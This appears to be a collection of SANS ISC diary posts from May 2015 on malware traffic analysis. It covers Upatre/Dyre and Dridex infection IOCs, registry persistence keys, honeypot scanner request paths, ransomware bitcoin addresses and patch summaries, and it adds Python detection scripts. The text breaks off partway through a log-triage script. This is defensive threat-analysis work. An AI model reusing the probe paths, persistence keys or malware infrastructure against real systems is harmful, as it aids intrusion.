As shown in the above image, these messages were tailored for the recipients.  You'll also notice some of the recipient email addresses contain random characters and numbers.  Nothing new here.  It's just one of the many waves of malspam our filters block every day.  I reported a similar wave earlier this month [1].  Let's look at the malware.

The attachment is a typical example of Upatre, much like we've seen before.  Let's see what this malware does in a controlled environment.

Indicators of compromise (IOC)

I ran the malware on a physical host and generated the following traffic:

  • 2015-05-19 15:16:12 UTC - 166.78.246.145 port 80 - icanhazip.com - GET /
  • 2015-05-19 15:16:13 UTC - 91.211.17.201 port 13410 - SYN packet to server, no response
  • 2015-05-19 15:16:16 UTC - 80.233.179.250 port 443 - two SYN packets to server, no response
  • 2015-05-19 15:16:58 UTC - 85.67.42.40 port 443 - two SYN packets to server, no response
  • 2015-05-19 15:17:40 UTC - 188.127.129.48 port 443 - SSL traffic - approx 510 KB sent from server to infected host
  • 2015-05-19 15:17:56 UTC - 217.10.68.152 port 3478 - UDP STUN traffic to: stun.sipgate.net
  • 2015-05-19 15:17:58 UTC - 62.122.69.132 port 443 - SSL traffic - approx 256 KB sent from server to infected host
  • 2015-05-19 15:18:40 UTC - 91.211.17.201 port 13409  - SYN packet to server, no response

In my last post about Upatre/Dyre, we saw Upatre-style HTTP GET requests to 91.211.17.201 but no HTTP response from the server [1].  That's been the case for quite some time now.  However, in this example, the infected host attempted a TCP connection to 91.211.17.201, but the connection was reset after the initial SYN packet, and an HTTP GET request was never sent.


Shown above: An example of Upatre-style HTTP GET requests from my previous ISC Diary on Upatre/Dyre


Shown above: Attempted TCP connections to the same IP address now reset (RST) by the server

How can we tell this is Upatre?  The malware checks for an IP address, and header lines in the associated HTTP GET request fit the pattern for Upatre.

As I've mentioned before, icanhazip.com is a service run by one of my fellow Rackspace employees [2].  By itself, it's not malicious.  Unfortunately, malware authors use this and similar services to check an infected computer's IP address.

What alerts trigger on this traffic?  See the image below for Emerging Threats-based Snort events on the infection traffic using Security Onion.

Related files on the infected host include:

  • C:\Users\username\AppData\Local\PwTwUwWTWcqBhWG.exe (Dyre)
  • C:\Users\username\AppData\Local\ne9bzef6m8.dll
  • C:\Users\username\AppData\Local\Temp\~TP95D5.tmp (encrypted or otherwise obfuscated)
  • C:\Users\username\AppData\Local\Temp\Jinhoteb.exe (where Upatre copied itself after it was run)

Some Windows registry changes for persistence:

  • Key name: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run
  • Key name: HKEY_USERS\S-1-5-21-52162474-342682794-3533990878-1000\Software\Microsoft\Windows\CurrentVersion\Run
  • Value name: GoogleUpdate
  • Value type: REG_SZ
  • Value data: C:\Users\username\AppData\Local\PwTwUwWTWcqBhWG.exe

A pcap of the infection traffic is available at:

A zip file of the associated Upatre/Dyre malware is available at:

The zip file is password-protected with the standard password.  If you don't know it, email admin@malware-traffic-analysis.net and ask.

Final words

This was yet another wave of Upatre/Dyre malspam.  No real surprises, but it's always interesting to note the small changes from these campaigns.

---
Brad Duncan, Security Researcher at Rackspace
Blog: www.malware-traffic-analysis.net - Twitter: @malware_traffic

References:

[1] https://isc.sans.edu/diary/UpatreDyre+the+daily+grind+of+botnetbased+malspam/19657
[2] https://major.io/icanhazip-com-faq


Published: 2015-05-19

False Positive? settings-win.data.microsoft.com resolving to Microsoft Blackhole IP

Thanks to Xavier for bringing this to our attention. It looks like a couple of days ago a legitimate Microsoft host name, settings-win.data.microsoft.com, started to resolve to an IP address in a range Microsoft commonly uses for the blackholes (sinkholes) it operates:

$ host settings-win.data.microsoft.com
settings-win.data.microsoft.com is an alias for settings.data.glbdns2.microsoft.com.
settings.data.glbdns2.microsoft.com is an alias for blackhole6.glbdns2.microsoft.com.
blackhole6.glbdns2.microsoft.com has address 131.253.18.253

Connecting to a blackhole IP like this is often an indicator of compromise, and many IDSs will flag it. For example:

[**] [1:2016101:2] ET TROJAN DNS Reply Sinkhole - Microsoft - 131.253.18.0/24 [**] [Classification: A Network Trojan was detected] [Priority: 1] ...

It is not yet clear which process causes the connection to this IP on port 443, but a number of other users are reporting similar issues. For example, see here:

https://social.technet.microsoft.com/Forums/windowsserver/en-US/37aecee6-0df9-4234-8159-c632070478ad/strange-dns-requests-blocked-by-ips?forum=winserversecurity

At this point, I am assuming that this is some kind of configuration error at Microsoft.
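When an IDS alert like the one above fires, the first question is whether the final answer in the resolution chain really lands in a sinkhole range. The following script is an added example, not part of the original diary: it parses `host` output, flags any A record inside a configured sinkhole range (the 131.253.18.0/24 range comes from the ET alert quoted above; the label text and the "blackhole" name heuristic are this example's own), and reports the CNAME chain so an analyst can see that a legitimate name is being pointed at the sinkhole rather than a host resolving a malicious domain. The clean sample is constructed with a TEST-NET address.

```python
import ipaddress
import re

# Sinkhole ranges to test against. The 131.253.18.0/24 entry comes from the
# ET alert quoted above; the label wording is this example's own.
SINKHOLE_RANGES = {
    "Microsoft sinkhole 131.253.18.0/24 (ET SID 2016101)": ipaddress.ip_network("131.253.18.0/24"),
}

# Heuristic (an assumption of this example): a CNAME target that calls itself a
# blackhole/sinkhole deserves a look even if the IP is not in our range list.
BLACKHOLE_NAME_RE = re.compile(r"(blackhole|sinkhole)", re.IGNORECASE)

ALIAS_RE = re.compile(r"^(\S+) is an alias for (\S+?)\.?$")
ADDR_RE = re.compile(r"^(\S+) has (?:IPv6 )?address (\S+)$")


def parse_host_output(text):
    """Parse the output of `host <name>` into a CNAME chain and the final A/AAAA records."""
    chain, addrs = [], []
    for line in text.splitlines():
        line = line.strip()
        m = ALIAS_RE.match(line)
        if m:
            chain.append((m.group(1), m.group(2)))
            continue
        m = ADDR_RE.match(line)
        if m:
            addrs.append((m.group(1), ipaddress.ip_address(m.group(2))))
    return chain, addrs


def check_host_output(text):
    """Flag answers whose final address sits in a known sinkhole range, and CNAME
    targets whose name advertises a blackhole. Returns a small report dict."""
    chain, addrs = parse_host_output(text)
    query = chain[0][0] if chain else (addrs[0][0] if addrs else None)
    sinkholed = [
        (name, str(ip), label)
        for name, ip in addrs
        for label, net in SINKHOLE_RANGES.items()
        if ip in net
    ]
    suspicious_names = [target for _, target in chain if BLACKHOLE_NAME_RE.search(target)]
    return {
        "query": query,
        "chain": [target for _, target in chain],
        "sinkholed": sinkholed,
        "suspicious_names": suspicious_names,
    }


# Sample 1 is the `host` output shown above; sample 2 is a constructed clean answer (TEST-NET address).
SAMPLE_SINKHOLED = """\
settings-win.data.microsoft.com is an alias for settings.data.glbdns2.microsoft.com.
settings.data.glbdns2.microsoft.com is an alias for blackhole6.glbdns2.microsoft.com.
blackhole6.glbdns2.microsoft.com has address 131.253.18.253
"""
SAMPLE_CLEAN = "www.example.test has address 192.0.2.10\n"

if __name__ == "__main__":
    for sample in (SAMPLE_SINKHOLED, SAMPLE_CLEAN):
        report = check_host_output(sample)
        print(report["query"], "->", " -> ".join(report["chain"]) or "(no CNAME)")
        for name, ip, label in report["sinkholed"]:
            print("  SINKHOLED:", name, ip, label)
```

The caveat this case illustrates: a sinkhole hit on a name under a vendor's own domain is evidence that the vendor (here Microsoft) redirected its own hostname, not that the client resolved a malicious domain. Treat it as something to investigate and correlate with the process making the connection, not as grounds to reimage the host. Sinkhole ranges also change over time, so keep the list fed from your IDS ruleset rather than hard-coding it for long.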

---
Johannes B. Ullrich, Ph.D.
STI|Twitter|LinkedIn


Published: 2015-05-19

IoT roundup: Apple Watch Patches, Router Vulnerabilities

Yes, there is a security patch for the Apple Watch now. It fixes 13 different vulnerabilities. At least one of the vulnerabilities (CVE-2015-1093) can be used to execute arbitrary code. But not all of the vulnerabilities are "cutting edge". We also got an ICMP redirect issue (CVE-2015-1103) and of course SSL issues that are addressed by disabling old ciphers (FREAK vulnerability) and updating the list of trusted CAs.

The Internet of Things certainly gets a lot of attention this year, and I think rightfully so. I consider web gateways/routers a prime example, and just to make that point, here are the top 10 request lines hitting our web application honeypot:

  25700  GET / HTTP/1.1\r\n
  10596  GET http
   9059  GET /cgi-bin/authLogin.cgi HTTP/1.1\n  <- QNAP shellshock issue
   6771  GET /phpMyAdmin/scripts/setup.php HTTP/1.1\r\n
   6638  GET /pma/scripts/setup.php HTTP/1.1\r\n
   6511  GET /myadmin/scripts/setup.php HTTP/1.1\r\n
   4297  GET /manager/html HTTP/1.1\r\n
   3939  GET /manager/html/ HTTP/1.1\r\n
   3672  GET /tmUnblock.cgi HTTP/1.1\r\n <- Linksys Routers (see "Moon Worm")
   2820  GET /pony/includes/templates/error.tpl HTTP/1.1\r\n

Two of our top ten URLs target devices exclusively. So make sure you are patched as well as it gets, and avoid exposing the admin interface to the public.

---
Johannes B. Ullrich, Ph.D.
STI|Twitter|LinkedIn


Published: 2015-05-18

Address spoofing vulnerability in Safari Web Browser

A new vulnerability has been found in the Safari web browser that allows address spoofing: an attacker can display any URL in the address bar while a different web page is shown. While this proof of concept is not perfect, it could easily be refined for use in phishing attacks.

There is a proof of concept http://www.deusen.co.uk/items/iwhere.9500182225526788/. From an iPad Air 2 Safari Web Browser:

From same iPad using Google Chrome:

The code is very simple: the page reloads every 10 milliseconds using the setInterval() function, before the browser can finish fetching the real page, so the user sees the "real" web address in the address bar instead of the fake one:

We are interested if you notice any phishing attacks using this vulnerability. If you see one, please let us know using our contact form.

Manuel Humberto Santander Peláez
SANS Internet Storm Center - Handler
Twitter: @manuelsantander
Web:http://manuel.santander.name
e-mail: msantand at isc dot sans dot org


Published: 2015-05-16

VENOM - Does it live up to the hype?

Unless you have been hiding under a rock this week you have heard about VENOM.  The first article that I saw was from ZDNet with the headline of "Bigger than Heartbleed, 'Venom' security vulnerability threatens most datacenters".  Pretty provocative stuff.  Is VENOM really worth that much hype?
 
VENOM stands for Virtualized Environment Neglected Operations Manipulation. The cute acronym basically means that the exploit takes advantage of a vulnerability in legacy code. In short, the vulnerability is CVE-2015-3456 and it is found in fdc.c, the virtual floppy disk controller code used in some virtualization products, the most popular being QEMU, Xen and KVM. The vulnerability permits someone with administrator access in a virtual machine (VM) to potentially escape the VM and execute arbitrary code within the host virtualization software, with the permissions of that software. The worst case scenario is that the attacker escapes to the host and from there accesses other guests on the same machine. To the best of my knowledge nobody has succeeded in demonstrating the worst case. Note that the vulnerable FDC code is present even when no floppy drive is configured for the guest, so removing the virtual floppy is not a mitigation; patching is.
 
Should we panic?
 
This vulnerability is important because it has the potential to affect a significant portion of the virtualization platforms that are in common use today, but there is no reason to panic. 
* The vulnerability cannot be exploited remotely, nor is it possible to scan for it remotely.
* To even attempt exploitation, the attacker needs administrator (root) level shell access inside a virtualized guest.
* While a proof of concept exists that exploits the vulnerability, nobody has demonstrated any practical use of the exploit.
* Patches are available for all affected virtualization platforms. 
 
Certainly not of the significance of Heartbleed or FREAK.  While it is important to get vulnerable systems patched as soon as reasonable there is no reason to panic.
 

-- Rick Wanner MSISE - rwanner at isc dot sans dot edu - http://namedeplume.blogspot.com/ - Twitter:namedeplume (Protected)


Published: 2015-05-15

Another Maldoc? I'm Afraid So...

Guess what? Yep, there's yet another type of malicious document going around. Like last time, it's a MIME file with an MSO file containing an OLE file.

The sample (schro_193B11.xls 7F8C5E8B7157B04FA8E9CEEF13C28AB9) is an Excel spreadsheet saved as a MIME file:

But this time, the compressed data is at another position inside the MSO file:

So I updated my oledump tool (V0.0.16) to search for compressed data inside MSO files (instead of looking at a fixed offset of 50).

The string encoding used in the VBA code is interesting. It is reminiscent of RC4:

I also updated my plugin plugin_dridex with this encoding:

Didier Stevens
Microsoft MVP Consumer Security
blog.DidierStevens.com DidierStevensLabs.com


Published: 2015-05-14

Oh Bloat!

I recently installed a new printer. Windows didn't seem to know its driver, so I "had" to supply the CD-ROM that came with the printer. Of course, being a device driver, it asked for admin privileges to install. I went for custom install instead of full, but that option failed and crashed in EMET with a buffer overflow. Not a good omen. But since I wanted to print, I de-selected "custom" and went for "recommended". Yes, I'm naive at times. Apparently, all it takes to "p0wn" me is to ship me a printer together with a CD. [blush].

20 minutes later, I was the proud owner of FOUR pieces of software that have NOTHING to do with printing. What the [beep]! And to add insult to injury, TWO of the four pieces didn't show up in Add-Remove-Programs, and hence could not be "easily" evicted again. The most annoying piece was "isuspm", Acresso Software Manager. Completely getting rid of the four pieces of bloatware required use of Sysinternals "Autoruns", plus generous "del /s /q /f *" at the prompt, plus six! reboots. Yes, I probably could have reverted to a snapshot, but I kinda wanted to keep the printer driver itself.

Hello, dear printer vendors: Charge me 15$ more for the printer, if you must, but stop wasting my time un-installing all that [beeping] [beep]!

If you are in a similar situation, ignore whatever comes with the printer (especially the CD!), go to the web site of the printer manufacturer, and search for the device driver for the model at hand. Somewhat to my surprise, they offered an "expert" install that came without all the crud, and just included the driver. Now .. why can't this minimal installation also be on the CD? Why screw all the poor home users [and naive ISC handlers :)] for no good reason except to make five measly dollars on the side??

 


Published: 2015-05-13

Recent Dridex activity

Introduction

Botnet-based Dridex malspam is like the Energizer Bunny.  It just won't quit.  We see it almost every day.

Since last year, botnet hosts pushing Dridex have been using macros in Microsoft Word documents or Excel spreadsheets to deliver the malware [1].  These files are most often attachments in malicious spam (malspam).

Dridex traffic has evolved somewhat since I last blogged about it [2].  For this diary, we'll look at a wave from Tuesday, 2015-05-12 as described on the Dynamoo Blog [3].  I saw a few of these messages while reviewing emails blocked by my employer's spam filters.  Let's take a closer look...

Email Example

Nothing really ground-breaking here.  In this wave, hosts associated with Dridex malspam used the recipient as part of the name for the malicious attachment, but we've seen this before.

Traffic Generated by the Malware

I infected a host by opening the Excel spreadsheet and enabling macros.  Reviewing the traffic with Security Onion revealed several info and policy events.  It also alerted on a likely Dridex certificate in the SSL traffic.

A pcap of the traffic is available at: http://malware-traffic-analysis.net/2015/05/12/2015-05-12-dridex-traffic.pcap

Below is a list of HTTP GET requests and other indicators of compromise (IOCs) noted in the pcap file:

  • 141.101.112.16 port 80 - pastebin.com - GET /download.php?i=5K5YLjVu
  • 92.63.88.87 port 8080 - 92.63.88.87:8080 - GET /bt/get.php 
  • 5.9.44.37 port 80 - savepic.org - GET /7257790.jpg
  • 14.98.183.4 port 443 - TLS traffic
  • 31.24.30.65 port 443 - TLS traffic
  • 46.36.217.227 port 3443 - TLS traffic
  • 75.145.133.5 port 443 - TLS traffic
  • 82.112.185.104 port 8000 - TLS traffic
  • 87.117.229.29 port 443 - TLS traffic
  • 144.76.109.82 port 443 - TLS traffic
  • 45.55.154.235 port 80 - encrypted traffic
  • 79.149.254.3 port 80 - encrypted traffic / TLS traffic
  • 27.60.164.164 port 443 - SYN packet only (no response)
  • 65.51.130.39 port 443 - SYN packet only (no response)
  • 82.17.98.133 port 443 - SYN packet only (no response)
  • 89.228.50.77 port 1443 - SYN packet only (no response)
  • 95.163.121.215 port 80 - SYN packet only (no response)
  • 131.111.216.180 port 443 - SYN packet only (no response)
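The IOC list above is more useful as a set of behaviours than as a set of addresses: TLS on ports other than 443, certificates for example.com/example.net, an executable fetched from a bare-IP Host header, and a burst of unanswered SYNs to many peers. The script below is an added example (not code from the diary) that scores flow records against exactly those traits. The IP and URI indicators are copied from the list above; 141.101.112.16 is left out of the IP set because it is a Cloudflare address fronting pastebin.com, so the pastebin download URI is matched instead. The flow records, the TEST-NET source address, the `SYN_ONLY_THRESHOLD` value and the benign intranet certificate name are constructed for the example.

```python
import ipaddress
from collections import Counter

# IP indicators copied from the list above. 141.101.112.16 is left out on purpose:
# it is a Cloudflare address fronting pastebin.com, so the URI is matched instead.
DRIDEX_IOC_IPS = {
    "92.63.88.87", "5.9.44.37", "14.98.183.4", "31.24.30.65", "46.36.217.227",
    "75.145.133.5", "82.112.185.104", "87.117.229.29", "144.76.109.82",
    "45.55.154.235", "79.149.254.3", "27.60.164.164", "65.51.130.39",
    "82.17.98.133", "89.228.50.77", "95.163.121.215", "131.111.216.180",
}
DRIDEX_IOC_URIS = {"/download.php?i=5K5YLjVu", "/bt/get.php", "/7257790.jpg"}
PLACEHOLDER_CERT_NAMES = {"example.com", "example.net"}
SYN_ONLY_THRESHOLD = 3  # distinct unanswered targets before we call it beaconing (assumption)


def _is_bare_ip(host):
    """True when an HTTP Host header is an IPv4 literal, optionally with :port."""
    if not host:
        return False
    try:
        ipaddress.ip_address(host.rsplit(":", 1)[0])
        return True
    except ValueError:
        return False


def score_flow(flow):
    """Return the list of reasons one flow record looks like Dridex post-infection traffic."""
    reasons = []
    if flow["dst"] in DRIDEX_IOC_IPS:
        reasons.append("known-ioc-ip")
    if flow.get("uri") in DRIDEX_IOC_URIS:
        reasons.append("known-ioc-uri")
    if flow["proto"] == "tls" and flow["dport"] != 443:
        reasons.append(f"tls-on-port-{flow['dport']}")
    cn = (flow.get("cert_cn") or "").lower()
    if cn in PLACEHOLDER_CERT_NAMES:
        reasons.append(f"placeholder-cert-{cn}")
    if flow["proto"] == "http" and _is_bare_ip(flow.get("host")):
        reasons.append("http-host-is-ip")
    return reasons


def triage(flows):
    """Score every flow and summarise: flagged count, distinct SYN-only peers
    (a C2 list where most nodes are already dead), and an overall verdict."""
    per_flow = [(f["dst"], f["dport"], score_flow(f)) for f in flows]
    syn_only = {f["dst"] for f in flows if f["proto"] == "syn-only"}
    reason_counts = Counter(r for _, _, rs in per_flow for r in rs)
    beaconing = len(syn_only) >= SYN_ONLY_THRESHOLD
    flagged = sum(1 for _, _, rs in per_flow if rs)
    return {
        "per_flow": per_flow,
        "flagged": flagged,
        "syn_only_targets": len(syn_only),
        "beaconing": beaconing,
        "reason_counts": reason_counts,
        "verdict": "likely infected" if flagged or beaconing else "nothing found",
    }


# Constructed flow records modelled on the IOC list above (source address is TEST-NET).
SAMPLE_FLOWS = [
    {"src": "192.0.2.50", "dst": "141.101.112.16", "dport": 80, "proto": "http", "host": "pastebin.com", "uri": "/download.php?i=5K5YLjVu"},
    {"src": "192.0.2.50", "dst": "92.63.88.87", "dport": 8080, "proto": "http", "host": "92.63.88.87:8080", "uri": "/bt/get.php"},
    {"src": "192.0.2.50", "dst": "5.9.44.37", "dport": 80, "proto": "http", "host": "savepic.org", "uri": "/7257790.jpg"},
    {"src": "192.0.2.50", "dst": "14.98.183.4", "dport": 443, "proto": "tls", "cert_cn": "example.com"},
    {"src": "192.0.2.50", "dst": "46.36.217.227", "dport": 3443, "proto": "tls", "cert_cn": "example.com"},
    {"src": "192.0.2.50", "dst": "82.112.185.104", "dport": 8000, "proto": "tls", "cert_cn": "example.net"},
    {"src": "192.0.2.50", "dst": "79.149.254.3", "dport": 80, "proto": "tls", "cert_cn": "example.com"},
    {"src": "192.0.2.50", "dst": "27.60.164.164", "dport": 443, "proto": "syn-only"},
    {"src": "192.0.2.50", "dst": "65.51.130.39", "dport": 443, "proto": "syn-only"},
    {"src": "192.0.2.50", "dst": "82.17.98.133", "dport": 443, "proto": "syn-only"},
    {"src": "192.0.2.50", "dst": "192.0.2.200", "dport": 443, "proto": "tls", "cert_cn": "intranet.corp.test"},
]

if __name__ == "__main__":
    report = triage(SAMPLE_FLOWS)
    for dst, dport, reasons in report["per_flow"]:
        print(f"{dst}:{dport:<5} {', '.join(reasons) or '-'}")
    print("verdict:", report["verdict"], "| SYN-only peers:", report["syn_only_targets"])
```

The behavioural checks (TLS on 80/8000/3443, placeholder certificate names, a bare-IP Host header) keep catching traffic after the listed addresses rotate, which they do within days. The "TLS on port 80" check only works if the sensor identifies TLS by content rather than by port, as Security Onion's Bro/Suricata stack does; a port-based classifier will log those sessions as HTTP and never reach the certificate fields.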

Screenshots from the Traffic

After enabling macros for the malicious Excel spreadsheet, the host called for a visual basic script (VBS) file from pastebin:

The VBS file generated an HTTP GET request to download a Windows executable file (the Dridex malware):

Shortly after that, a small JPG image was downloaded by the infected host:

Dridex activity included SSL traffic to various IP addresses, mostly with example.com SSL certificates.  I also noted an SSL certificate for example.net as shown below:

SSL traffic happened on various TCP ports, including port 80:

Malware

People have submitted the Windows executable to various public sites for malware analysis:

A zip archive of the malware is also available at: http://malware-traffic-analysis.net/2015/05/12/2015-05-12-dridex-malware.zip

The zip file is password-protected with the standard password. If you don't know it, email me at admin@malware-traffic-analysis.net and ask.

Final Notes

The last time I looked into Dridex traffic, I saw a lot of post-infection HTTP GET requests over port 80.  In this example, the post-infection traffic was mainly SSL or otherwise encrypted.  Can't wait to see what Dridex has in store for us next!

---
Brad Duncan, Security Researcher at Rackspace
Blog: www.malware-traffic-analysis.net - Twitter: @malware_traffic

References:

[1] http://researchcenter.paloaltonetworks.com/2015/01/dridex-banking-trojan-begins-2015-bang/
[2] http://www.malware-traffic-analysis.net/2015/04/15/index.html
[3] http://blog.dynamoo.com/2015/05/malware-spam-attn-outstanding-invoices.html


Published: 2015-05-12

May 2015 Microsoft Patch Tuesday Summary

Overview of the May 2015 Microsoft patches and their status.

Each entry below lists the bulletin, the bulletins it replaces, the CVEs, the KB number, known exploits, Microsoft's severity and exploitability index (**), and the ISC rating (*) for clients and servers.

MS15-043 Cumulative Security Update for Internet Explorer (Replaces MS15-032)
  CVEs: CVE-2015-1658, CVE-2015-1684, CVE-2015-1685, CVE-2015-1686, CVE-2015-1688, CVE-2015-1689, CVE-2015-1691, CVE-2015-1692, CVE-2015-1694, CVE-2015-1703, CVE-2015-1704, CVE-2015-1705, CVE-2015-1706, CVE-2015-1708, CVE-2015-1709, CVE-2015-1710, CVE-2015-1711, CVE-2015-1712, CVE-2015-1713, CVE-2015-1714, CVE-2015-1717, CVE-2015-1718
  KB 3049563 - Known exploits: none - Microsoft: Critical, Exploitability 1 - ISC: clients Critical, servers Critical

MS15-044 Vulnerabilities in Microsoft Font Drivers Could Allow Remote Code Execution (Replaces MS13-034, MS13-082, MS15-023)
  CVEs: CVE-2015-1670, CVE-2015-1671
  KB 3057110 - Known exploits: none - Microsoft: Critical, Exploitability 1 - ISC: clients Critical, servers Critical

MS15-045 Vulnerability in Windows Journal Could Allow Remote Code Execution (Replaces MS14-038)
  CVEs: CVE-2015-1675, CVE-2015-1695, CVE-2015-1696, CVE-2015-1697, CVE-2015-1698, CVE-2015-1699
  KB 3046002 - Known exploits: none - Microsoft: Critical, Exploitability 2 - ISC: clients Critical, servers Critical

MS15-046 Vulnerabilities in Microsoft Office Could Allow Remote Code Execution (Replaces MS13-085, MS15-012, MS15-022, MS15-033)
  CVEs: CVE-2015-1682, CVE-2015-1683
  KB 3057181 - Known exploits: none - Microsoft: Important, Exploitability 1 - ISC: clients Critical, servers Important

MS15-047 Vulnerabilities in Microsoft SharePoint Server Could Allow Remote Code Execution (Replaces MS12-066, MS15-022)
  CVEs: CVE-2015-1700
  KB 3058083 - Known exploits: none - Microsoft: Important, Exploitability 2 - ISC: clients Important, servers Critical

MS15-048 Vulnerabilities in .NET Framework Could Allow Elevation of Privilege (Replaces MS12-038, MS13-015, MS13-040, MS13-082, MS14-009)
  CVEs: CVE-2015-1672, CVE-2015-1673
  KB 3057134 - Known exploits: none - Microsoft: Important, Exploitability 3 - ISC: clients Important, servers Important

MS15-049 Vulnerability in Silverlight Could Allow Elevation of Privilege (Replaces MS14-014)
  CVEs: CVE-2015-1715
  KB 3058985 - Known exploits: none - Microsoft: Important, Exploitability 2 - ISC: clients Important, servers Important

MS15-050 Vulnerability in Service Control Manager Could Allow Elevation of Privilege
  CVEs: CVE-2015-1702
  KB 3055642 - Known exploits: none - Microsoft: Important, Exploitability 2 - ISC: clients Important, servers Important

MS15-051 Vulnerabilities in Windows Kernel-Mode Drivers Could Allow Elevation of Privilege (Replaces MS15-023)
  CVEs: CVE-2015-1676, CVE-2015-1677, CVE-2015-1678, CVE-2015-1679, CVE-2015-1680, CVE-2015-1701
  KB 3057191 - Known exploits: vulnerability publicly disclosed - Microsoft: Important, Exploitability 0 (Microsoft's index value for exploitation detected) - ISC: clients Important, servers Important

MS15-052 Vulnerability in Windows Kernel Could Allow Security Feature Bypass (Replaces MS15-010)
  CVEs: CVE-2015-1674
  KB 3050514 - Known exploits: none - Microsoft: Important, Exploitability 2 - ISC: clients Important, servers Important

MS15-053 Vulnerabilities in JScript and VBScript Scripting Engines Could Allow Security Feature Bypass (Replaces MS11-031, MS12-056)
  CVEs: CVE-2015-1684, CVE-2015-1686
  KB 3057263 - Known exploits: none - Microsoft: Important, Exploitability 2 - ISC: clients Important, servers Important

MS15-054 Vulnerability in Microsoft Management Console File Format Could Allow Denial of Service
  CVEs: CVE-2015-1681
  KB 3051768 - Known exploits: none - Microsoft: Important, Exploitability 2 - ISC: clients Important, servers Important

MS15-055 Vulnerability in Schannel Could Allow Information Disclosure (Replaces MS15-031)
  CVEs: CVE-2015-1716
  KB 3061518 - Known exploits: none - Microsoft: Important, Exploitability 1 - ISC: clients Important, servers Important
We will update issues on this page for about a week or so as they evolve.
We appreciate updates
US based customers can call Microsoft for free patch related support on 1-866-PCSAFETY
(*): ISC rating
  • We use 4 levels:
    • PATCH NOW: Typically used where we see immediate danger of exploitation. Typical environments will want to deploy these patches ASAP. Workarounds are typically not accepted by users or are not possible. This rating is often used when typical deployments make it vulnerable and exploits are being used or easy to obtain or make.
    • Critical: Anything that needs little to become "interesting" for the dark side. Best approach is to test and deploy ASAP. Workarounds can give more time to test.
    • Important: Things where more testing and other measures can help.
    • Less Urgent: Typically we expect the impact, if exploited, to affect a small number of people; workarounds are available. For servers we assume best practices such as not using Outlook, MSIE, Word etc. to do traditional office or leisure work.
    • The rating is not a risk analysis as such. It is a rating of the importance of the vulnerability and the perceived or even predicted threat for affected systems.

       

---
Johannes B. Ullrich, Ph.D.
STI|Twitter|LinkedIn


Published: 2015-05-12

Angler exploit kit pushes new variant of ransomware

Introduction

The Angler exploit kit (EK) is being used to push a new variant of TeslaCrypt/AlphaCrypt ransomware.  I've been documenting cases of Angler EK pushing AlphaCrypt in recent weeks [1][2][3].  Last week on 2015-05-07, I started seeing a new variant [4].  This new variant has a popup window that uses CTB-Locker-style instructions.

As seen below, this variant doesn't provide a name for itself in the decrypt instructions.

The same malware sample used a different bitcoin address for each host it infected.

Traffic Characteristics of this New Ransomware Variant

The traffic appears identical to what we've seen with previous infections from TeslaCrypt and AlphaCrypt.  A few hours ago I infected a host from a site using Angler EK and received similar alerts from the network traffic.


Shown above:  Alerts from monitoring the infection with Security Onion.


Shown above:  HTTP traffic from the infection.  Click on the image to see it full-size.

A sample of the ransomware can be found at: 
https://malwr.com/analysis/MjE3ODRlYzc1MmQ2NGUyNDkyYWNkNWM0OWZiOGVjYzE/

I infected 4 different hosts with Angler EK in a 5-hour timeframe and received the same ransomware.  It was the same file with the same hash each time.  However, the bitcoin address for the ransom payment was different for each infected host.  Shown below are decrypt pages from the other 3 hosts:

Here are the bitcoin addresses from these infected hosts:

  • 14ctiiDNPLNh2YqmHFaPexAasi6vL5cqKX
  • 1K23HDxnozzdfnzgmLeGGUkwyqpPmucnQS
  • 1KcYaNQFsSm5hPX36Y855jsjceazoB3MXZ
  • 1QJmYhyBWrjCDqvYmk6hh4drpX7NN7TVxq

​Pcap files of the infection traffic (Angler EK and the post-infection) are available at:

Final Words

From what I can tell, TeslaCrypt and AlphaCrypt are very similar to CryptoLocker.  This new, unnamed variant appears to be another evolution from this family of ransomware.

I've been seeing a lot of Angler EK lately.  In recent weeks, more often than not, it's been pushing ransomware.  Since 2015-05-07, I've only seen this new variant.

---
Brad Duncan, Security Researcher at Rackspace
Blog: www.malware-traffic-analysis.net - Twitter: @malware_traffic

References:

[1] http://malware-traffic-analysis.net/2015/04/30/index.html
[2] http://malware-traffic-analysis.net/2015/05/06/index.html
[3] http://malware-traffic-analysis.net/2015/05/07/index.html
[4] http://malware-traffic-analysis.net/2015/05/07/index2.html


Published: 2015-05-11

SOC Analyst Pyramid

Introduction

Last weekend, I did a 10 minute fireside chat during lunch at BSidesSATX 2015 [1].  It was an informal presentation, where I discussed some of the issues facing security analysts working at an organization's Security Operations Center (SOC).

With only 10 minutes, the largest part of that presentation covered a "SOC analyst pyramid" of activity any organization will encounter.

For the presentation, security analysts are defined as people who monitor their organization's network for near-real-time detection of malicious activity.  Security analysts review alerts from their organization's intrusion detection systems (IDS) or security information and event management (SIEM) appliances.  These alerts are based on various sources, such as network traffic and event logs.

SOC Analyst Pyramid

Below is a visual representation of this pyramid:

As seen in the image above, the pyramid from top to bottom reads:

  • Targeted attacks
  • Malicious activity - not blocked
  • Malicious activity - blocked or not applicable
  • False positives or non-threat

Base of the SOC Analyst Pyramid

The base of the SOC analyst pyramid consists of false positives or valid activity unique to your organization's network.  In my years as an analyst, investigating this activity took up the majority of my time.  At times, you'll need to document why an alert triggers a false positive, so it can be filtered and allow the team to focus on real suspicious activity.

In my experience, no matter how well-tuned your security monitoring system is, analysts spend most of their time at this level of the pyramid.

Next Tier: Malicious Activity - Blocked or Not Applicable

The next level involves malicious activity that's either blocked or not applicable.  Blocked activity includes spam with malware attachments (malspam) blocked by your organization's spam filters.  Non-applicable activity includes certain types of scanning.  The intent is malicious, but the scans are blind and not applicable to the targeted host.  For example, here's a short list of activity from the error logs of a server I run:

That server doesn't run WordPress, nor does it have any sort of web-based administrative login, but I'll find WordPress-based scans hitting the server's IP every day.  That shows malicious intent, but it's not applicable.
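Sorting that kind of error-log noise into the pyramid's tiers is mechanical once you know which applications a server actually runs. The script below is an added example (not from the diary) that does the sorting: each Apache error-log line is matched against scanner signatures tied to a product (WordPress, phpMyAdmin, Tomcat, Linksys routers), and a hit lands in the "blocked or not applicable" tier when the product is not deployed and in the "not blocked, review" tier when it is. Generic probes such as directory traversal always go to review; missing favicons and the like are non-threat. The log lines, the TEST-NET client addresses, the signature list and the tier names are constructed for the example; the parsed format is Apache 2.2's error_log, with 2.4's ":port" suffix tolerated.

```python
import re
from collections import Counter

# Apache 2.2-style error_log line; 2.4 adds ":port" after the client IP, which the regex tolerates.
LOG_RE = re.compile(r"^\[(?P<ts>[^\]]+)\] \[error\] \[client (?P<ip>[\d.]+)(?::\d+)?\] (?P<msg>.*)$")

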